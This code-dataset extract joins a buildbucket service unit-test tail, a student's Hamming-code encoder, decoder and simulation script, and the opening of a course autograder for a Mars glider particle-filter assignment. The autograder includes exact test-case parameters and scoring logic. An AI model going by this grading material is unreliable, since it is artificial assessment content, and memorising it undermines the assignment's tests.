service.reset_expired_builds()\n build = self.test_build.key.get()\n self.assertEqual(build.status, model.BuildStatus.COMPLETED)\n\n def test_build_timeout(self):\n self.test_build.create_time = utils.utcnow() - datetime.timedelta(days=365)\n self.test_build.put()\n\n service.reset_expired_builds()\n build = self.test_build.key.get()\n self.assertEqual(build.status, model.BuildStatus.COMPLETED)\n self.assertEqual(build.result, model.BuildResult.CANCELED)\n self.assertEqual(build.cancelation_reason, model.CancelationReason.TIMEOUT)\n self.assertIsNone(build.lease_key)\n\n ########################## RESET EXPIRED BUILDS ##############################\n\n def test_delete_many_scheduled_builds(self):\n self.test_build.put()\n completed_build = model.Build(\n bucket=self.test_build.bucket,\n status=model.BuildStatus.COMPLETED,\n result=model.BuildResult.SUCCESS,\n )\n completed_build.put()\n self.assertIsNotNone(self.test_build.key.get())\n self.assertIsNotNone(completed_build.key.get())\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED)\n self.assertIsNone(self.test_build.key.get())\n self.assertIsNotNone(completed_build.key.get())\n\n def test_delete_many_started_builds(self):\n self.test_build.put()\n\n started_build = model.Build(\n bucket=self.test_build.bucket,\n status=model.BuildStatus.STARTED,\n )\n started_build.put()\n\n completed_build = model.Build(\n bucket=self.test_build.bucket,\n status=model.BuildStatus.COMPLETED,\n result=model.BuildResult.SUCCESS,\n )\n completed_build.put()\n\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.STARTED)\n self.assertIsNotNone(self.test_build.key.get())\n self.assertIsNone(started_build.key.get())\n self.assertIsNotNone(completed_build.key.get())\n\n def test_delete_many_builds_with_tags(self):\n self.test_build.tags = ['tag:1']\n self.test_build.put()\n\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED, tags=['tag:0'])\n self.assertIsNotNone(self.test_build.key.get())\n\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED, tags=['tag:1'])\n self.assertIsNone(self.test_build.key.get())\n\n def test_delete_many_builds_created_by(self):\n self.test_build.created_by = 
auth.Identity('user', 'nodir@google.com')\n self.test_build.put()\n other_build = model.Build(bucket=self.test_build.bucket)\n other_build.put()\n\n service._task_delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED,\n created_by='nodir@google.com')\n self.assertIsNone(self.test_build.key.get())\n self.assertIsNotNone(other_build.key.get())\n\n def test_delete_many_builds_auth_error(self):\n self.mock_cannot(acl.Action.DELETE_SCHEDULED_BUILDS)\n with self.assertRaises(auth.AuthorizationError):\n service.delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED)\n\n def test_delete_many_builds_schedule_task(self):\n service.delete_many_builds(\n self.test_build.bucket, model.BuildStatus.SCHEDULED)\n\n def test_delete_many_completed_builds(self):\n with self.assertRaises(errors.InvalidInputError):\n service.delete_many_builds(\n self.test_build.bucket, model.BuildStatus.COMPLETED)\n\n ########################### LONGEST_PENDING_TIME ############################\n\n def test_longest_pending_time(self):\n builds = [\n model.Build(\n bucket='chromium',\n tags=['builder:x'],\n create_time=self.now - datetime.timedelta(minutes=10),\n ),\n model.Build(\n bucket='chromium',\n tags=['builder:x'],\n create_time=self.now - datetime.timedelta(minutes=20),\n ),\n model.Build(\n bucket='chromium',\n tags=['builder:y'],\n create_time=self.now - datetime.timedelta(minutes=30),\n ),\n ]\n for b in builds:\n b.put()\n actual = service.longest_pending_time('chromium', 'x')\n self.assertEqual(actual, datetime.timedelta(minutes=20))\n\n def test_longest_pending_time_invalid_input(self):\n with self.assertRaises(errors.InvalidInputError):\n service.longest_pending_time('', 'x')\n with self.assertRaises(errors.InvalidInputError):\n service.longest_pending_time('chromium', '')\n\n def test_longest_pending_time_no_builds(self):\n actual = service.longest_pending_time('chromium', 'x')\n self.assertEqual(actual, datetime.timedelta(0))\n\n def test_longest_pending_time_without_permissions(self):\n self.mock_cannot(acl.Action.ACCESS_BUCKET)\n with self.assertRaises(auth.AuthorizationError):\n service.longest_pending_time('chromium', 'x')\n","sub_path":"appengine/cr-buildbucket/test/service_test.py","file_name":"service_test.py","file_ext":"py","file_size_in_byte":29820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"586643444","text":"#To Do:\n #Edit brute force for any value of r *****\n #Fix error printing messages (local search and syndrome) *****\n #BSC *****\n #hammingDEP ***** repetitionDEP\n #hammingSimulation ***** repetitionSimulation\n\nimport math\nimport random\nfrom random import randint\n\ndef Hamming_Distance(v1,v2):\n hd = 0 #set a variable for hamming distance\n if len(v1) == len(v2): #check the vectors are the same length\n for i in range(len(v1)):\n if v1[i] != v2[i]: #check to see if elements are different\n hd+=1 #if the elements are different, incremen hd\n return hd \n print('The Hamming Distance is',hd)\n \n\ndef decimalToVector(i,l):\n number = bin(i)[2:] #convert the number to binary and remove the 'b'\n if l < len(number): #check to see if the number can be made from the number of bits specified\n print('The number of chosen bits is too little for this number.')\n else:\n vector = [] #set up a variable for the vector\n if len(number) < l: #check to see if 0's need to be added\n d = l - len(bin(i)[2:]) #work out how many 0's need to be added\n for i in range(d):\n vector.append('0') #add the correct 
number of 0's to the vector\n for i in range(len(vector)):\n vector[i] = int(vector[i]) #convert the string to an integer\n for i in range(len(number)):\n vector.append(int(number[i])) #add the original binary number to the end of the 0's\n return vector\n\n\ndef vectorToDecimal(v):\n lst_v = [] #create an empty list for the decimal\n for items in v:\n lst_v.append(str(items)) #add the elements of the vector to the list\n decimal = int((''.join(lst_v)),2) #convert from binary to regular number using base 2\n print('The decimal of this vector is',decimal)\n\n\n\ndef vectorTimesMatrix(v,G):\n i = 0 \n m = 0 \n count = 0 #variable for the number of rows completed\n times = 0 #set up a variable for the addition of the digits\n calc_vector = [] #create a variable for the output\n if len(v) != len(G): #check to see if the matrix and vector have the same length\n print('Error: dimensions do not match')\n else:\n while i <= len(v):\n times += G[i][m] * v[i] #multiply one number from the vector by the first digit of the first row of the matrix \n i+=1 #increment to the next digit in the row\n if i == len(v):\n m+=1 #move to the next row of the matrix\n i=0 #move back to the first digit of the current row\n count+=1 #number of rows completed\n if str(times) not in '0' and str(times) not in '1':#convert any number that is not 1 or 0 to a 1 or 0 dependent on the number\n times = int(bin(times)[-1]) #take the last digit of the binary number, 0 representing odd, 1 representing even\n calc_vector.append(times) #add the number to the output variable\n times = 0\n if count == len(G[0]): #determine when the multiplicaiton is complete\n break\n return calc_vector\n\n\ndef MatrixGridPrint(G):\n for vector in G:\n row = []\n for digit in vector:\n row.append(str(digit))\n print(''.join(row))\n\n\ndef VectorAddition(v1,v2):\n ans = [] #setup a list for the output vector\n for i in range(len(v1)):\n add = v1[i] + v2[i] #add the respective numebers to each other\n if str(add) not in '0' and str(add) not in '1':#convert value which are 0 or 1\n add = int(bin(add)[-1]) #take the last digit of the binary of that number\n ans.append(add) #add the number to the output vector\n return ans\n \n\ndef hammingGeneratorMatrix(r):\n n = 2**r-1\n pi = [] #construct permutation pi\n for i in range(r):\n pi.append(2**(r-i-1))\n for j in range(1,r):\n for k in range(2**j+1,2**(j+1)):\n pi.append(k)\n rho = [] #construct rho = pi^(-1)\n for i in range(n):\n rho.append(pi.index(i+1))\n global H\n H = [] #construct H'\n for i in range(r,n):\n H.append(decimalToVector(pi[i],r))\n GG = [list(i) for i in zip(*H)] #construct G'\n for i in range(n-r):\n GG.append(decimalToVector(2**(n-r-i-1),n-r))\n G = [] #apply rho to get Gtranspose\n for i in range(n):\n G.append(GG[rho[i]])\n G = [list(i) for i in zip(*G)] #transpose\n return G\n\n\ndef repetitionEncoder(m,n):\n rep_code = [] #create list for output vector\n for i in range(n): #number of element to be added\n rep_code.append(m) #add the correct number of the correct element\n print('The encoded version is',rep_code)\n\n\ndef repetitionDecoder(v):\n if v.count(0) > v.count(1): #check to see if number of 0's > number of 1's\n print(0)\n elif v.count(1) > v.count(0): #check to see if number of 1's > number of 0's\n print(1)\n else:\n print('Decoder failure: no unique nearest codeword.')\n\n\ndef hammingEncoder(m):\n r = 2 #set the minimum value of r\n k = len(m) #set the variable k equal to length of input vector\n while r in range(11):\n if r >= 10:\n print('Error: incorrect 
length')\n break\n elif 2**r - r - 1 == k: #test values of r to see if equal to k\n encoded = vectorTimesMatrix(m,hammingGeneratorMatrix(r))#multiply the vector by the correct generator matrix\n return encoded\n break\n else:\n r+=1 #increment r in order to try another value\n\n\n\n\ndef hammingBruteForce(v):\n r = 2 #r >= 2 \n while r in range(2,10): #Begin ascertaining a value of r\n k = 2**r - r -1 #calculate a value of k from the value of r generated\n test_vector = [0]*k #setup a test vector for vectorTimesMatrix\n new_vector = vectorTimesMatrix(test_vector,hammingGeneratorMatrix(r))#multiply the test vector for that value of r by the hammingGeneratorMatrix for that value of r\n if r == 9:\n print('Error: incorrect length')\n break\n elif len(new_vector) == len(v): #value of r is found if length of new vector the same as length of input vector, v\n j = 2**(len(v)-r) #calculate the max number of m values\n n = len(v) - r #calcualte the max number of bits needed for decimalToVector in order to generate all the numbers in range(0,m)\n i,u = 0,0 #create variable for the number decimalToVector and print counter\n while i in range(0,j):\n B = decimalToVector(i,n) #convert the decimal to a vector with the correct number of bits\n m = vectorTimesMatrix(B,hammingGeneratorMatrix(r))#multiply the number by the correct generator matrix as found earlier\n print('m' + str(u) + ' = ' +str(m))\n print('d(v, m' + str(u)+') = ' + str(Hamming_Distance(v,m)))\n u+=1 #increment the printing counter\n if Hamming_Distance(v,m) <= 1: #check the hamming distance between the original vector and the output vector\n return m\n print('c =',m) #print coddeword if dH = 1\n break\n else:\n i+=1 #increment the number decimalToVector will generate\n break \n else:\n r+=1 #increment the value of r that is being tested\n\n\n\ndef HammingTranspose(m):\n HTranspose = [list(i) for i in zip(*m)]\n return HTranspose\n\n\n\ndef ParityCheckMatrix(r):\n pcm_setup = [] #create variable for the output matrix\n for i in range(1,2**r): #calculate the range of numbers to be generated \n new_vector = []\n new_vector = decimalToVector(i,r) #convert the numbers to binary with the correct number of bits based on r\n pcm_setup.append(new_vector) #add the numbers to the output matrix\n pcm = HammingTranspose(pcm_setup) #transpose the matrix to the correct format\n return pcm\n\n\n\ndef hammingLocalSearch(v):\n r = 2\n while r in range(2,10): #Begin ascertaining a value of r\n k = 2**r - r -1 #calculate a value of k from the value of r generated\n test_vector = [0]*k #setup a test vector for vectorTimesMatrix\n new_vector = vectorTimesMatrix(test_vector,hammingGeneratorMatrix(r))#multiply the test vector for that value of r by the hammingGeneratorMatrix for that value of r\n if r == 9:\n print('Error: incorrect length')\n break\n elif len(new_vector) == len(v): #value of r is found if length of new vector the same as length of input vector, v\n i = 0 #create a count variable for the position in e list which is equal to 1\n e = [0]*len(v) #set up a list of 0's with length equal to input vector\n en = 1 #counter for when printing v + e[en] = ...\n new_vector = VectorAddition(v,e) #add 1 to a position of the original vector \n while i in range(len(e)+1):\n vHt = vectorTimesMatrix(new_vector,HammingTranspose(ParityCheckMatrix(r)))#calculate vHt\n if len(v) != len(HammingTranspose(ParityCheckMatrix(r))):\n print('Error: incorrect length')\n break\n elif vHt == [0]*r: #check to see if the correct vHt has been outputted, hence the codeword is 
found\n return new_vector\n print('Syndrome =',vHt)\n print('c =',new_vector)\n break\n else:\n print('Syndrome =',vHt)\n e = [0]*len(v) #reset list e to its original state\n e[i] = 1 #add one to the position relating to i\n new_vector = VectorAddition(v,e)#add the new list e with 1 in a different position to the original vector\n print('v + e' + str(en) + ' = ' + str(new_vector))\n i+=1 #increment the position in the list e which is assigned to 1\n en+=1 #increment the printing counter\n break\n else:\n r+=1 #increment the value of r that is being tested\n\n\ndef hammingSyndrome(v):\n r = 2\n while r in range(2,10): #Begin ascertaining a value of r\n k = 2**r - r -1 #calculate a value of k from the value of r generated\n test_vector = [0]*k #setup a test vector for vectorTimesMatrix\n new_vector = vectorTimesMatrix(test_vector,hammingGeneratorMatrix(r))#multiply the test vector for that value of r by the hammingGeneratorMatrix for that value of r\n if r == 9:\n print('Error: incorrect length')\n break\n elif len(new_vector) == len(v): #value of r is found if length of new vector the same as length of input vector, v\n e = [0]*len(v) #set up a list of 0's with length equal to input vector\n vHt = vectorTimesMatrix(v,HammingTranspose(ParityCheckMatrix(r)))#calculate vHt\n if vHt == [0]*r: #check to see if the correct vHt has been outputted, hence the codeword is found\n return v\n print('c =',v)\n break\n elif len(v) != len(HammingTranspose(ParityCheckMatrix(r))):\n print('Error: incorrect length')\n else:\n print('Syndrome =',vHt)\n digits = [] #turn the list of the vector input into a string\n for digit in vHt:\n digits.append(str(digit))\n i = int(''.join(digits),2) #convert from binary to decimal in order to calculate the correct position for 1 to be added to\n #print('The position for the 1 to be added is',str(i))\n e[i-1] = 1 #convert the correct position to a 1\n new_vector = VectorAddition(v,e) #add the e list to the original vector\n return new_vector\n print('c =',new_vector)\n break\n else:\n r+=1 #increment the value of r that is being tested\n\n\ndef hammingRecover(c):\n message = [] #create a variable for the output message\n for i in range(1,len(c)+1):\n if (math.log(i,2))%1 != 0: #check if the position number is a power of 2\n message.append(c[i-1]) #if not a power of 2, add to the output message\n return message\n print(message)\n\n\ndef BSC(p,c):\n for i in range(len(c)):\n number = random.random() #generate random number between 0 and 1\n if number < p: #check if number is less than specified value of p\n if c[i] == 1: #flip bit from 1 to 0\n c[i] = 0\n elif c[i] == 0: #flip bit from 0 to 1\n c[i] = 1\n else:\n c[i] = c[i] #keep the bit the same\n return c\n print(c)\n\n\n\ndef hammingDEP(p,r): \n n = 2**r - 1 #calculate a value of n from r\n dep = 1 - ((1-p)**n) - (n*p)*(1-p)**(n-1) #calculate the value for DEP using probabalistic formula\n print('Theoretical DEP =',str(round(dep,2))) #print the number rounded to 2dp\n\n\n#def repetitionDEP(p,n):\n \n\ndef hammingSimulation(T,p,r):\n s = 0 #set up a variable for the number of simulations completed\n sim_number = 1 #set up a variable for the simulation counter\n success = 0 #set up a variable to count the number of decode successes\n while s < T:\n print('\\n' + 'Simulation ' + str(sim_number) + '\\n')#print the simulation number\n k = 2**r - r - 1 #calculate a value for length of random message based on r\n message = [] #set up a variable for this random message\n for i in range(k):\n message.append(randint(0,1)) 
#generate the random message \n print('Message m =',message)\n encoded = hammingEncoder(message) #hamming encode the message\n print('Codeword c =',encoded)\n bsc = BSC(p,encoded) #send it the encoded message through the BSC\n print('Received v =',bsc)\n v = hammingSyndrome(bsc) #decode the output of the BSC\n print('Decoded hatc =',v)\n message_recover = hammingRecover(v) #recover the original message from the decoder output\n print('Retrieved hatm =',message_recover)\n if message_recover == message: #check to see if the decode was a success i.e. original message is the output message\n print('Decoder success')\n success+=1 #increment the success counter\n else:\n print('Decoder error') \n s+=1 #increment the simulation number\n sim_number+=1 #increment the simulation print counter number\n experimentalDEP = success/T #calculate the experimental value of DEP\n print('\\n' + 'Experimental DEP = ' + str(experimentalDEP) + '\\n')\n hammingDEP(p,r) #calculate the theoretical value of DEP \n\n\nhammingSimulation(2,0.1,3)\n\n\n#def repetitionSimulation(T,p,n):\n \n \n \n\n\n\n\n\n\n\n\n\n#u = [1,0,1,1]\n#print('\\n')\n#v = [0,1,1,0,0,0,0]\n#print('\\n')\n#hammingEncoder([1,0,0,0])\n#print('\\n')\n#hammingEncoder([1,1,1,0,0,0,0])\n#print('\\n')\n#hammingBruteForce(u)\n#print('\\n')\n#hammingBruteForce(v)\n#print('\\n')\n#hammingLocalSearch(u)\n#print('\\n')\n#hammingLocalSearch(v)\n#print('\\n')\n#hammingSyndrome(u)\n#print('\\n')\n#hammingSyndrome(v)\n \n\n\n \n\n\n \n\n\n\n","sub_path":"Eddies-Code/Python/Summative/ErroCorrecting/ErrorCorrectingV1.18Notes.py","file_name":"ErrorCorrectingV1.18Notes.py","file_ext":"py","file_size_in_byte":18010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"609491824","text":"from __future__ import division\nfrom __future__ import print_function\nfrom builtins import zip\nfrom builtins import range\nfrom builtins import object\nfrom past.utils import old_div\n######################################################################\n# This file copyright the Georgia Institute of Technology\n#\n# Permission is given to students to use or modify this file (only)\n# to work on their assignments.\n#\n# You may NOT publish this file or make it available to others not in\n# the course.\n#\n######################################################################\n\n#!/usr/bin/python\n\nimport math\nimport random\nimport unittest\nimport glider\nimport multiprocessing as mproc\nimport queue\nimport traceback\nfrom opensimplex import OpenSimplex\n\n\nTIME_LIMIT = 10 # seconds - Note, if you turn on Verbose Logging \n # or Plotting of Particles, you will want to increase this\n # number from the 10 used in grading to a much higher value.\n\t\t # If you have a fast computer, you may want to reduce this \n\t # number to match your computer's speed to that of the \n # VM used by GradeScope\n\nVERBOSE = False # False for grading \nPLOT_PARTICLES = False # False for grading (Set to True for Vizualization!)\nPLOT_MAP = False # False for grading (True for map coloring in part A )\n\t\t # (Note: PLOT_MAP requires PLOT_PARTICLES Vizualization!)\nPART_A = True # Enable/disable Part A (Estimation) - True for grading\nPART_B = True # Enable/disable Part B (Steering) - True for grading\n\n########################################################################\n# If your debugger does not handle multiprocess debugging very easily\n# then when debugging set the following flag 
true.\n########################################################################\nDEBUGGING_SINGLE_PROCESS = False\n\nWINDOW_SIZE = 400 #Size of the window in \"units\" (actually 2x this...)\n\n\n#Note for Mac OS High Sierra users having problems with \"an error occurred while attempting to obtain endpoint for listener\" errors:\n#Running with the following environment variable fixed this issue for one student. \n#OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES\n#Looks like a problem specific to Mac OS High Sierra and internal threading libraries.\n\nPI = math.pi\nCREDIT_PER_PASS = 7 # points per test case pass.\n\n#10 test cases, ran in both parts A & B for 20 total.\n# Max score if you get all test cases is potentially 140, but capped at 101 \n# This means you do not need to get all test cases for a full score.\n\n\n# The real test cases will be generated using generate_parms_marsglidder.py \n# You are welcome to make your own test cases\n# and share them on Piazza to expose issues that these test cases may miss.\n#\n#\n\n\nGLOBAL_PARAMETERS = [None,\n\n\t\t #Case 1 has no noise to make things easy for you!\n {'test_case': 1,\n 'target_x': 39.84595717195,\n 'target_y': -13.82584680823,\n 'target_heading': 1.335,\n 'map_seed': 1,\n 'map_freq': 4.0,\n 'measurement_noise': 0.0,\n 'turning_noise': 0.0,\n 'max_steps': 4500 },\n\n\n\n #Case 2 has no measurement noise, so hopefully you can \n #locate the glider, even with turning noise.\n \n #\n {'test_case': 2,\n 'target_x': 199.95,\n 'target_y': -199.23,\n 'target_heading': -0.75598927002,\n 'map_seed': 2,\n 'map_freq': 4.0,\n 'measurement_noise': 0.0,\n 'turning_noise': 0.01,\n 'max_steps': 4500 },\n\n\n #Case 3 has only measurement noise, and no turning noise!\n {'test_case': 3,\n 'target_x': -99.6,\n 'target_y': 199.23,\n 'target_heading': 0.598927002,\n 'map_seed': 2,\n 'map_freq': 2.0,\n 'measurement_noise': 0.1,\n 'turning_noise': 0.0,\n 'max_steps': 4500 },\n\n\t #Case 4 has both measurement AND (more) turning noise!\n {'test_case': 4,\n 'target_x': 242.8,\n 'target_y': 139.450053,\n 'target_heading': -0.65272,\n 'map_seed': 1,\n 'map_freq': 2.0,\n 'measurement_noise': 0.1,\n 'turning_noise': 0.050,\n 'max_steps': 4500 },\n\n\t\t #Case 5 has no noise\n # note that the heading is on the extreme end of\n # the random range for possible headings!\n {'test_case': 5,\n 'target_x': 19.84595717195,\n 'target_y': -23.82584680823,\n 'target_heading': 1.5703,\n 'map_seed': 5,\n 'map_freq': 3.0,\n 'measurement_noise': 0.0,\n 'turning_noise': 0.0,\n 'max_steps': 4500 },\n\n \n {'test_case': 6,\n 'target_x': 199.95,\n 'target_y': 166.0,\n 'target_heading': 0.1152,\n 'map_seed': 6,\n 'map_freq': 8.0,\n 'measurement_noise': 0.5,\n 'turning_noise': 0.02,\n 'max_steps': 4500 },\n\n\n {'test_case': 7,\n 'target_x': -99.6,\n 'target_y': 199.23,\n 'target_heading': 0.298927002,\n 'map_seed': 2,\n 'map_freq': 4.0,\n 'measurement_noise': 1.0,\n 'turning_noise': 0.05,\n 'max_steps': 4500 },\n\n {'test_case': 8,\n 'target_x': 232.8,\n 'target_y': 139.53,\n 'target_heading': -0.65272,\n 'map_seed': 3,\n 'map_freq': 2.0,\n 'measurement_noise': 4.0,\n 'turning_noise': 0.000,\n 'max_steps': 4500 },\n\n\n {'test_case': 9,\n 'target_x': 49.84595717195,\n 'target_y': -83.82584680823,\n 'target_heading': -0.340218,\n 'map_seed': 9,\n 'map_freq': 4.0,\n 'measurement_noise': 1.0,\n 'turning_noise': 0.00,\n 'max_steps': 4500 },\n\n {'test_case': 10,\n 'target_x': 19.84595717195,\n 'target_y': -23.82584680823,\n 'target_heading': -0.3703,\n 'map_seed': 5,\n 'map_freq': 4.0,\n 
'measurement_noise': 0.50,\n 'turning_noise': 0.09,\n 'max_steps': 4500 },\n\n\n ]\n\n\n#Function that generates the map function....\ndef getMapFunc(Seed, Freq):\n #initialize OpenSimplex one time, use it many times.\n gen = OpenSimplex(Seed)\n\n def mapFunc(nx,ny):\n #Force 1 unit resolution by flooring nx,ny to nearest integer.\n nx = int(nx)\n ny = int(ny)\n nx = nx / 5000.0\n ny = ny / 5000.0\n\n #Generate noise from both low and high frequency noise:\n e0 = 1 * gen.noise2d(Freq * nx, Freq * ny)\n e1 = 0.5 * gen.noise2d(Freq*4*nx, Freq*4*ny)\n e2 = 0.25 * gen.noise2d(Freq*16*nx, Freq*16*ny)\n e = e0 + e1 + e2\n\n return e * 500 #500 meters above/below average...\n\n return mapFunc\n\ndef getMapColor( h, hmin, hmax ):\n cmin = 128\n cmax = 255\n color_scale = (cmax - cmin) / (hmax - hmin)\n h_clipped = max( min( h, hmax ), hmin )\n c = round( (h_clipped - hmin) * color_scale ) + cmin\n return (255, 127 + round(c * 0.5), c)\n\n#Try importing the student code here:\n\ntry:\n import marsglider \n marsglider1Exc=None\nexcept Exception as e:\n print(\"Error importing marsglider.py:\", e)\n marsglider1Exc=e\n\nclass GliderSimulator(object):\n \"\"\"Run student submission code.\n\n Attributes:\n glider_steps(Queue): synchronized queue to store glider steps.\n glider_found(Queue): synchronized queue to store if glider located.\n glider_error(Queue): synchronized queue to store exception messages.\n \"\"\"\n def __init__(self):\n\n if DEBUGGING_SINGLE_PROCESS:\n\n self.glider_steps = queue.Queue(1)\n self.glider_found = queue.Queue(1)\n self.glider_error = queue.Queue(1)\n\n else:\n\n self.glider_steps = mproc.Queue(1)\n self.glider_found = mproc.Queue(1)\n self.glider_error = mproc.Queue(1)\n\n def _reset(self):\n \"\"\"Reset submission results.\n \"\"\"\n while not self.glider_steps.empty():\n self.glider_steps.get()\n\n while not self.glider_found.empty():\n self.glider_found.get()\n\n while not self.glider_error.empty():\n self.glider_found.get()\n\n @staticmethod\n def distance(p, q):\n \"\"\"Calculate the distance between two points.\n\n Args:\n p(tuple): point 1.\n q(tuple): point 2.\n\n Returns:\n distance between points.\n \"\"\"\n x1, y1 = p[0],p[1]\n x2, y2 = q\n\n dx = x2 - x1\n dy = y2 - y1\n\n return math.sqrt(dx**2 + dy**2)\n\n @staticmethod\n def truncate_angle(t):\n \"\"\"Truncate angle between pi and -pi.\n\n Args:\n t(float): angle to truncate.\n\n Returns:\n truncated angle.\n \"\"\"\n return ((t + PI) % (2 * PI)) - PI\n\n def simulate_without_steering(self, estimate_next_pos, params):\n \"\"\"Run simulation only to locate glider.\n\n Args:\n estimate_next_pos(func): Student submission function to estimate next glider position.\n params(dict): Test parameters.\n\n Raises:\n Exception if error running submission.\n \"\"\"\n self._reset()\n\n #make the test somewhat repeatable by seeding the RNG.\n random.seed(params['map_seed'])\n\n ourMapFunc = getMapFunc( params['map_seed'], params['map_freq'])\n #Student function is separate, so they can mess it up if they want.\n studentMapFunc = getMapFunc( params['map_seed'], params['map_freq'] )\n\n target = glider.glider(params['target_x'],\n params['target_y'],\n 5000 + random.randint(-50,50), #Altitude\n params['target_heading'],\n ourMapFunc)\n target.set_noise(params['measurement_noise'],\n params['turning_noise'],\n 2.0 ) #Altitude (barameter) noise\n\n tolerance = 5.0 \n other_info = None\n steps = 0\n\n\n #Set up the particle plotter if requested\n if PLOT_PARTICLES == True:\n import turtle\t\t#Only import if plotting is on.\n 
X1,Y1,X2,Y2 = (-WINDOW_SIZE, -WINDOW_SIZE, WINDOW_SIZE, WINDOW_SIZE)\n turtle.setup(width=WINDOW_SIZE*2, height=WINDOW_SIZE*2) #800 pixels is screensize\n turtle.setworldcoordinates(X1,Y1, X2,Y2 )\n\n turtle.clearscreen()\n turtle.colormode(255)\n turtle.delay(0)\n turtle.hideturtle()\n turtle.penup()\n\n if PLOT_MAP:\n turtle.tracer(100000)\n\n bgturtle = turtle.Turtle()\n bgturtle.shape('square')\n bgturtle.speed(0)\n bgturtle.penup()\n for x in range(X1,X2,5):\n for y in range(Y1,Y2,5):\n bgturtle.goto(x,y)\n bgturtle.color( getMapColor( ourMapFunc(x,y), -500, 500 ) )\n bgturtle.stamp()\n\n turtle.tracer(1)\n\n turtleList = []\n target_turtle = None\n estimate_turtle = None\n\n try:\n while steps < params['max_steps']:\n target_meas = target.sense()\n target_height = target.get_height()\n\n result = estimate_next_pos(target_height,target_meas, studentMapFunc, other_info)\n\n if len(result) == 3:\n estimate, other_info,extra_points = result\n elif len(result) == 2: \n estimate, other_info = result\n extra_points = None\n else:\n print(\"estimate_next_pos did not return correct number of return values!\")\n\n\t\t#Calculate the actual position of the target next timestep.\n target = target.glide()\n target_pos = (target.x, target.y)\n\n if PLOT_PARTICLES == True and extra_points != None:\n\n #If the target goes outside the window coordinates,\n #recenter the window on the target.\n if target_pos[0] < X1 or target_pos[0] > X2 or target_pos[1] < Y1 or target_pos[1] > Y2:\n #calculate new bounding rectangle:\n X1 = target_pos[0] - WINDOW_SIZE \n X2 = X1 + 2000\n Y1 = target_pos[1] - WINDOW_SIZE \n Y2 = Y1 + 2000\n turtle.setworldcoordinates(X1,Y1, X2,Y2 )\n\n if PLOT_MAP:\n bgturtle.clear()\n turtle.tracer(100000)\n for x in range(round(X1),round(X2),20):\n for y in range(round(Y1),round(Y2),20):\n bgturtle.goto(x,y)\n bgturtle.color( getMapColor( ourMapFunc(x,y), -500, 500 ) )\n bgturtle.stamp()\n turtle.tracer(1)\n\n s = turtle.getscreen()\n s.tracer(0,1)\n\n # Add turtles if needed.\n while len(extra_points) > len(turtleList):\n newTurtle = turtle.Turtle()\n newTurtle.penup()\n turtleList.append(newTurtle)\n\n # remove turtles if needed.\n while len(extra_points) < len(turtleList):\n turtleList[-1].hideturtle()\n turtleList = turtleList[0:-1]\n\n for i in range(len(extra_points)):\n t = turtleList[i]\n p = extra_points[i]\n #Optionally plot heading if provided by student\n if len(p) > 2:\n t.shape(\"triangle\")\n t.shapesize(0.2,0.4)\n t.settiltangle( p[2] * 180 / math.pi )\n else:\n t.shape(\"circle\")\n t.shapesize(0.1,0.1)\n t.setposition(p[0],p[1])\n\n #Draw the actual glider.\n if target_turtle is not None:\n target_turtle.hideturtle()\n\n if target_turtle is None:\n target_turtle = turtle.Turtle()\n target_turtle.shape(\"triangle\")\n target_turtle.shapesize(0.2, 0.4)\n target_turtle.pencolor(\"red\")\n target_turtle.fillcolor(\"red\")\n target_turtle.penup()\n\n target_turtle.setposition(target_pos[0], target_pos[1])\n target_turtle.settiltangle( target.heading * 180 / math.pi )\n target_turtle.showturtle()\n\n #Draw the student estimate of the glider\n if estimate_turtle is not None:\n estimate_turtle.hideturtle()\n\n if estimate_turtle is None:\n estimate_turtle = turtle.Turtle()\n estimate_turtle.shape(\"circle\")\n estimate_turtle.shapesize(0.5,0.5)\n estimate_turtle.fill = False\n estimate_turtle.color(\"purple\")\n estimate_turtle.penup()\n\n estimate_turtle.setposition(estimate[0], estimate[1])\n estimate_turtle.showturtle()\n\n s.update()\n\n \n separation = 
self.distance(estimate, target_pos)\n if separation < tolerance:\n self.glider_found.put(True)\n self.glider_steps.put(steps)\n return\n\n steps += 1\n\n if VERBOSE == True:\n actual_height = target.z\n ground_height = ourMapFunc(target.x, target.y)\n actual_dist_to_ground = actual_height - ground_height \n print(\"\\nStep: {} Actual ({}) predicted: ({})\\n Difference = {}\\n Height={}, Ground Height = {} Dist To Ground = {}\".format( steps, target_pos, estimate, separation, actual_height, ground_height, actual_dist_to_ground)) \n if extra_points != None and len(extra_points) > 0:\n particle_dist = []\n for p in extra_points:\n dist = self.distance(p,target_pos)\n particle_dist.append(dist)\n pMin = min(particle_dist)\n pMax = max(particle_dist)\n pAvg = sum(particle_dist) / float( len(particle_dist))\n print(\"{} Particles, Min dist: {}, Avg dist: {}, Max Dist: {}\".format(len(extra_points), pMin, pAvg, pMax))\n\n\n self.glider_found.put(False)\n self.glider_steps.put(steps)\n\n except:\n self.glider_error.put(traceback.format_exc())\n\n def simulate_with_steering(self, next_angle, params):\n \"\"\"Run simulation to allow glider to be steered.\n\n Args:\n next_angle(func): Student submission function for gliders next turn angle.\n params(dict): Test parameters.\n\n Raises:\n Exception if error running submission.\n \"\"\"\n self._reset()\n \n #make the test somewhat repeatable by seeding the RNG.\n random.seed(params['map_seed'])\n\n ourMapFunc = getMapFunc( params['map_seed'], params['map_freq'])\n #Student function is separate, so they can mess it up if they want.\n studentMapFunc = getMapFunc( params['map_seed'], params['map_freq'] )\n\n target = glider.glider(params['target_x'],\n params['target_y'],\n 5000 + random.randint(-50,50), #Altitude\n params['target_heading'],\n ourMapFunc)\n target.set_noise(params['measurement_noise'],\n params['turning_noise'],\n 2.0 ) # Altitude (barometer) noise\n target_pos = (target.x, target.y)\n\n other_info = None\n steps = 0\n tolerance = 10.0\t#Double tolerance for steering task.\n\n # Set up the plotter if requested\n if PLOT_PARTICLES == True:\n import turtle\n X1,Y1,X2,Y2 = (-WINDOW_SIZE, -WINDOW_SIZE, WINDOW_SIZE, WINDOW_SIZE)\n s = 